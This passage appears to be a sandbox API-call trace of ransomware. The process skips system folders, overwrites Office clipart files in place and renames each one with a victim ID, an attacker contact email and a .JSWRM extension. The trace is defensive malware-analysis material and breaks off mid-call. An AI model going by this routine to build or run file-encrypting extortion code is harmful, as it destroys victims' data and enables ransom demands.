[0081.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107192.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107192.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0081.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0081.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0081.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0081.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107192.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.937] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9968) returned 1 [0081.937] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x26f0) returned 0x24d210 [0081.937] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x26f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x26f0, lpOverlapped=0x0) returned 1 [0081.939] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.940] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x26f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x26f0, lpOverlapped=0x0) returned 1 [0081.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.940] CloseHandle (hObject=0x314) returned 1 [0081.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0081.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0081.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0081.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0081.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0081.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0081.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0081.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0081.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.940] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107192.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107192.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107192.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0081.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0081.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0081.941] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c3c1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6c3c1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6c3c1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ef4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107254.WMF", cAlternateFileName="")) returned 1 [0081.941] lstrcmpiW (lpString1="J0107254.WMF", lpString2=".") returned 1 [0081.941] lstrcmpiW (lpString1="J0107254.WMF", lpString2="..") returned 1 [0081.941] lstrcmpiW (lpString1="J0107254.WMF", lpString2="...") returned 1 [0081.941] lstrcmpiW (lpString1="J0107254.WMF", lpString2="windows") returned -1 [0081.941] lstrcmpiW (lpString1="J0107254.WMF", lpString2="recovery") returned -1 [0081.941] lstrcmpiW (lpString1="J0107254.WMF", lpString2="perflogs") returned -1 [0081.941] lstrcmpiW (lpString1="J0107254.WMF", lpString2="documents and settings") returned 1 [0081.941] lstrcmpiW (lpString1="J0107254.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.941] lstrcmpiW (lpString1="J0107254.WMF", lpString2="system volume information") returned -1 [0081.941] lstrcmpiW (lpString1="J0107254.WMF", lpString2="msocache") returned -1 [0081.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0081.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107254.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107254.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107254.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0081.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0081.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107254.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107254.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107254.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0081.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0081.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0081.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0081.942] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107254.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.942] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20212) returned 1 [0081.942] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4ef0) returned 0x24d210 [0081.943] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4ef0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4ef0, lpOverlapped=0x0) returned 1 [0081.945] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.945] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4ef0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4ef0, lpOverlapped=0x0) returned 1 [0081.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.946] CloseHandle (hObject=0x314) returned 1 [0081.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0081.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0081.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0081.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0081.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0081.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0081.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0081.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0081.946] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107254.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107254.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107254.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0081.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0081.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0081.947] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c3c1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6c3c1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6c3c1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2168, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107258.WMF", cAlternateFileName="")) returned 1 [0081.947] lstrcmpiW (lpString1="J0107258.WMF", lpString2=".") returned 1 [0081.947] lstrcmpiW (lpString1="J0107258.WMF", lpString2="..") returned 1 [0081.947] lstrcmpiW (lpString1="J0107258.WMF", lpString2="...") returned 1 [0081.947] lstrcmpiW (lpString1="J0107258.WMF", lpString2="windows") returned -1 [0081.947] lstrcmpiW (lpString1="J0107258.WMF", lpString2="recovery") returned -1 [0081.947] lstrcmpiW (lpString1="J0107258.WMF", lpString2="perflogs") returned -1 [0081.947] lstrcmpiW (lpString1="J0107258.WMF", lpString2="documents and settings") returned 1 [0081.947] lstrcmpiW (lpString1="J0107258.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.947] lstrcmpiW (lpString1="J0107258.WMF", lpString2="system volume information") returned -1 [0081.947] lstrcmpiW (lpString1="J0107258.WMF", lpString2="msocache") returned -1 [0081.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0081.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107258.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107258.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107258.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0081.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0081.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107258.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107258.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107258.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0081.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0081.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0081.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0081.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107258.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.948] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8552) returned 1 [0081.948] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2160) returned 0x205850 [0081.948] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2160, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2160, lpOverlapped=0x0) returned 1 [0081.950] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.950] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2160, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2160, lpOverlapped=0x0) returned 1 [0081.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0081.950] CloseHandle (hObject=0x314) returned 1 [0081.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0081.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0081.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0081.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0081.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0081.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0081.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.951] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107258.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107258.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107258.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0081.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0081.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0081.951] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c3c1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6c3c1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6c3c1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f3c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107262.WMF", cAlternateFileName="")) returned 1 [0081.951] lstrcmpiW (lpString1="J0107262.WMF", lpString2=".") returned 1 [0081.951] lstrcmpiW (lpString1="J0107262.WMF", lpString2="..") returned 1 [0081.951] lstrcmpiW (lpString1="J0107262.WMF", lpString2="...") returned 1 [0081.951] lstrcmpiW (lpString1="J0107262.WMF", lpString2="windows") returned -1 [0081.951] lstrcmpiW (lpString1="J0107262.WMF", lpString2="recovery") returned -1 [0081.951] lstrcmpiW (lpString1="J0107262.WMF", lpString2="perflogs") returned -1 [0081.951] lstrcmpiW (lpString1="J0107262.WMF", lpString2="documents and settings") returned 1 [0081.951] lstrcmpiW (lpString1="J0107262.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.951] lstrcmpiW (lpString1="J0107262.WMF", lpString2="system volume information") returned -1 [0081.952] lstrcmpiW (lpString1="J0107262.WMF", lpString2="msocache") returned -1 [0081.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0081.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107262.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107262.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107262.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0081.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0081.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107262.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107262.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107262.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0081.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0081.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0081.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0081.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107262.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.952] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7996) returned 1 [0081.952] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f30) returned 0x205850 [0081.952] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1f30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, 